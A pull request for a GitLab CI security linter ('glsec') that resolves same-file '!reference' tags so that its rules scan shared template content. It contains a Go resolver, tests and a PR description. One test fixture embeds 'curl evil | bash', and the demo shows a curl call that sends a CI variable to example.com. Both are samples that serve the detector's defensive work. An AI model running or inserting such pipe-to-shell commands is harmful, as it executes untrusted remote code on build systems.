### PR TITLE
feat: resolve same-file !reference tags before analysis (#225)

### DIFF
--- a/README.md
+++ b/README.md
@@ -113,6 +113,10 @@ exclude_paths:
 
 The script-analysis rules (e.g. GL002, GL011, GL024, GL025, GL047, GL048, GL050) assume **POSIX shell** (`bash`/`sh`) semantics — the default for Linux and macOS runners. PowerShell pipelines on Windows runners use different syntax (`$env:VAR` instead of `$VAR`, `Invoke-WebRequest` instead of `curl`, etc.), so these rules will not match them. **A Windows-runner job that emits no findings has not been meaningfully checked for shell issues** — don't treat the absence of findings there as a clean bill of health.
 
+### Reusable configuration
+
+glsec resolves YAML anchors/aliases (`&anchor` / `*alias`, handled natively by the parser) and GitLab [`!reference` tags](https://docs.gitlab.com/ci/yaml/yaml_optimization/#reference-tags) that point within the same file. Content pulled in via `!reference` is analysed as if it were inlined into the referencing job, so issues hidden in shared `.template` blocks are caught. References that resolve into `include:`d files are not yet expanded.
+
 ## ShellCheck integration
 
 glsec can optionally pass `script:`, `before_script:`, and `after_script:` blocks to [ShellCheck](https://www.shellcheck.net/) for deeper shell analysis. This is **opt-in** and requires ShellCheck to be installed separately.

--- a/internal/parser/parser.go
+++ b/internal/parser/parser.go
@@ -28,6 +28,7 @@ func Parse(data []byte, file string) (*Document, error) {
 	if root.Kind == 0 {
 		return nil, fmt.Errorf("%s: empty document", file)
 	}
+	ResolveReferences(&root)
 	return &Document{Root: &root, File: file}, nil
 }
 

--- a/internal/parser/reference.go
+++ b/internal/parser/reference.go
@@ -1,0 +1,132 @@
+package parser
+
+import (
+	"strings"
+
+	"gopkg.in/yaml.v3"
+)
+
+const referenceTag = "!reference"
+
+// ResolveReferences expands GitLab CI `!reference [a, b, …]` tags in place,
+// inlining same-file referenced content so downstream rules see it. References
+// that cannot be resolved within this document (e.g. they target content from
+// an include:) are left untouched. Circular references are detected and left
+// unresolved rather than recursing forever.
+//
+// https://docs.gitlab.com/ci/yaml/yaml_optimization/#reference-tags
+func ResolveReferences(doc *yaml.Node) {
+	top := doc
+	if top.Kind == yaml.DocumentNode && len(top.Content) > 0 {
+		top = top.Content[0]
+	}
+	if top.Kind != yaml.MappingNode {
+		return
+	}
+	expand(top, top, nil)
+}
+
+func isReference(n *yaml.Node) bool {
+	return n != nil && n.Tag == referenceTag
+}
+
+// expand walks node, resolving any !reference descendants. top is the document's
+// root mapping used for path lookups; active is the chain of reference paths
+// currently being resolved, used for cycle detection.
+func expand(node, top *yaml.Node, active []string) {
+	switch node.Kind {
+	case yaml.MappingNode:
+		for i := 1; i < len(node.Content); i += 2 {
+			if v := node.Content[i]; isReference(v) {
+				if resolved := resolveReference(v, top, active); resolved != nil {
+					node.Content[i] = resolved
+				}
+			} else {
+				expand(node.Content[i], top, active)
+			}
+		}
+	case yaml.SequenceNode:
+		out := make([]*yaml.Node, 0, len(node.Content))
+		for _, item := range node.Content {
+			if !isReference(item) {
+				expand(item, top, active)
+				out = append(out, item)
+				continue
+			}
+			resolved := resolveReference(item, top, active)
+			switch {
+			case resolved == nil:
+				out = append(out, item) // unresolvable — leave as-is
+			case resolved.Kind == yaml.SequenceNode:
+				out = append(out, resolved.Content...) // flatten into parent list
+			default:
+				out = append(out, resolved)
+			}
+		}
+		node.Content = out
+	}
+}
+
+// resolveReference returns a fully-resolved deep copy of the node referenced by
+// ref, or nil if the path cannot be resolved or would form a cycle.
+func resolveReference(ref, top *yaml.Node, active []string) *yaml.Node {
+	segs := make([]string, 0, len(ref.Content))
+	for _, c := range ref.Content {
+		if c.Kind != yaml.ScalarNode {
+			return nil
+		}
+		segs = append(segs, c.Value)
+	}
+	if len(segs) == 0 {
+		return nil
+	}
+
+	key := strings.Join(segs, "\x00")
+	for _, a := range active {
+		if a == key {
+			return nil // circular reference
+		}
+	}
+
+	target := lookupPath(top, segs)
+	if target == nil {
+		return nil
+	}
+
+	cp := deepCopyNode(target)
+	next := make([]string, len(active), len(active)+1)
+	copy(next, active)
+	next = append(next, key)
+	expand(cp, top, next)
+	return cp
+}
+
+// lookupPath navigates the path segments from the root mapping.
+func lookupPath(top *yaml.Node, segs []string) *yaml.Node {
+	cur := top
+	for _, s := range segs {
+		if cur.Kind != yaml.MappingNode {
+			return nil
+		}
+		v := FindKey(cur, s)
+		if v == nil {
+			return nil
+		}
+		cur = v
+	}
+	return cur
+}
+
+func deepCopyNode(n *yaml.Node) *yaml.Node {
+	if n == nil {
+		return nil
+	}
+	cp := *n
+	if len(n.Content) > 0 {
+		cp.Content = make([]*yaml.Node, len(n.Content))
+		for i, c := range n.Content {
+			cp.Content[i] = deepCopyNode(c)
+		}
+	}
+	return &cp
+}

--- a/internal/parser/reference_test.go
+++ b/internal/parser/reference_test.go
@@ -1,0 +1,146 @@
+package parser
+
+import (
+	"testing"
+	"time"
+
+	"gopkg.in/yaml.v3"
+)
+
+// scriptLines returns the scalar script lines of a job after parsing.
+func scriptLines(t *testing.T, doc *Document, job string) []string {
+	t.Helper()
+	top := doc.MappingNode()
+	jobNode := FindKey(top, job)
+	if jobNode == nil {
+		t.Fatalf("job %q not found", job)
+	}
+	scriptNode := FindKey(jobNode, "script")
+	if scriptNode == nil || scriptNode.Kind != yaml.SequenceNode {
+		t.Fatalf("job %q has no script sequence", job)
+	}
+	var out []string
+	for _, n := range scriptNode.Content {
+		if n.Kind == yaml.ScalarNode {
+			out = append(out, n.Value)
+		}
+	}
+	return out
+}
+
+func TestResolveReferences_SimpleSplice(t *testing.T) {
+	doc, err := Parse([]byte(`
+.shared:
+  script:
+    - curl evil | bash
+build:
+  script:
+    - make build
+    - !reference [.shared, script]
+`), "test.yml")
+	if err != nil {
+		t.Fatal(err)
+	}
+	lines := scriptLines(t, doc, "build")
+	want := []string{"make build", "curl evil | bash"}
+	if len(lines) != len(want) {
+		t.Fatalf("got %v, want %v", lines, want)
+	}
+	for i := range want {
+		if lines[i] != want[i] {
+			t.Errorf("line %d: got %q, want %q", i, lines[i], want[i])
+		}
+	}
+}
+
+func TestResolveReferences_NestedReference(t *testing.T) {
+	doc, err := Parse([]byte(`
+.a:
+  script:
+    - echo a
+.b:
+  script:
+    - !reference [.a, script]
+    - echo b
+build:
+  script:
+    - !reference [.b, script]
+`), "test.yml")
+	if err != nil {
+		t.Fatal(err)
+	}
+	lines := scriptLines(t, doc, "build")
+	want := []string{"echo a", "echo b"}
+	if len(lines) != 2 || lines[0] != want[0] || lines[1] != want[1] {
+		t.Fatalf("got %v, want %v", lines, want)
+	}
+}
+
+func TestResolveReferences_Unresolvable(t *testing.T) {
+	// .missing does not exist — the reference must be left intact, not panic.
+	doc, err := Parse([]byte(`
+build:
+  script:
+    - make build
+    - !reference [.missing, script]
+`), "test.yml")
+	if err != nil {
+		t.Fatal(err)
+	}
+	top := doc.MappingNode()
+	scriptNode := FindKey(FindKey(top, "build"), "script")
+	if len(scriptNode.Content) != 2 {
+		t.Fatalf("expected 2 items, got %d", len(scriptNode.Content))
+	}
+	if !isReference(scriptNode.Content[1]) {
+		t.Errorf("expected unresolved !reference to remain, got tag %q", scriptNode.Content[1].Tag)
+	}
+}
+
+func TestResolveReferences_Circular(t *testing.T) {
+	// .a references .b and .b references .a — must terminate.
+	done := make(chan struct{})
+	go func() {
+		_, _ = Parse([]byte(`
+.a:
+  script:
+    - !reference [.b, script]
+.b:
+  script:
+    - !reference [.a, script]
+build:
+  script:
+    - !reference [.a, script]
+`), "test.yml")
+		close(done)
+	}()
+	select {
+	case <-done:
+	case <-time.After(5 * time.Second):
+		t.Fatal("circular reference did not terminate")
+	}
+}
+
+func TestResolveReferences_MappingValue(t *testing.T) {
+	// !reference used as a whole mapping value (variables block).
+	doc, err := Parse([]byte(`
+.vars:
+  variables:
+    FOO: bar
+build:
+  variables: !reference [.vars, variables]
+  script:
+    - echo hi
+`), "test.yml")
+	if err != nil {
+		t.Fatal(err)
+	}
+	top := doc.MappingNode()
+	vars := FindKey(FindKey(top, "build"), "variables")
+	if vars == nil || vars.Kind != yaml.MappingNode {
+		t.Fatalf("expected resolved variables mapping, got %+v", vars)
+	}
+	if foo := FindKey(vars, "FOO"); foo == nil || foo.Value != "bar" {
+		t.Errorf("expected FOO=bar, got %+v", foo)
+	}
+}


### PR DESCRIPTION
## Summary

glsec now resolves GitLab CI `!reference [a, b, …]` tags that point within the same file, inlining the referenced content before rules run. Previously `yaml.v3` parsed `!reference` as an unresolved tagged node, and all script-scanning rules silently skipped it — so security issues hidden in shared `.template` blocks went undetected. Closes #225.

## How it works

`parser.ResolveReferences` runs inside `Parse`, after unmarshal:

1. Walks the document tree.
2. For each `!reference`-tagged node, parses the path segments (`[".shared", "script"]`) and navigates them from the root mapping.
3. Replaces the node with a deep copy of the resolved target. In a sequence context (the common script case) a referenced sequence is **flattened** into the parent list; elsewhere (e.g. a `variables:` value) the resolved node replaces it directly.
4. Nested references inside resolved content are expanded recursively.

Because this happens at parse time, **all existing rules transparently work on referenced content** with no rule changes.

## Edge cases handled

- **Unresolvable references** (path not found — e.g. it lives in an `include:`d file): left intact, no panic.
- **Circular references** (`.a` → `.b` → `.a`): detected via an active-path set; resolution terminates and leaves the cycle unresolved. Covered by a test with a 5s watchdog.
- **Anchors/aliases** (`&`/`*`) are unaffected — `yaml.v3` resolves those natively.

## Demo

```yaml
.shared:
  script:
    - curl https://example.com/$CI_COMMIT_REF_NAME
build:
  script:
    - make build
    - !reference [.shared, script]
```

Before: no finding on the referenced line in `build`. After: GL002 + GL025 fire for `build` (and still for `.shared`).

## Scope / follow-ups

- **Same-file resolution only.** References that resolve into `include:`d files are not expanded — that needs the included documents threaded into the parser (larger change). Noted in the issue's scope table as a separate case.
- The issue suggested an `info` finding for unresolvable (remote-include) references — deferred; would need a dedicated rule.
- Referenced content is reported both at the `.template` definition (glsec already scans hidden `.`-prefixed keys as jobs) and at the referencing job. This pre-existing template-scanning interaction is left as-is; deduping/skipping hidden templates is a separate decision.

## Files

- `internal/parser/reference.go` — resolver
- `internal/parser/reference_test.go` — splice, nested, unresolvable, circular, mapping-value cases
- `internal/parser/parser.go` — call `ResolveReferences` in `Parse`
- `README.md` — *Reusable configuration* note

## Test

```sh
go test ./...
# end-to-end: GL002/GL025 now fire on the !reference'd line in the referencing job
```

Closes #225.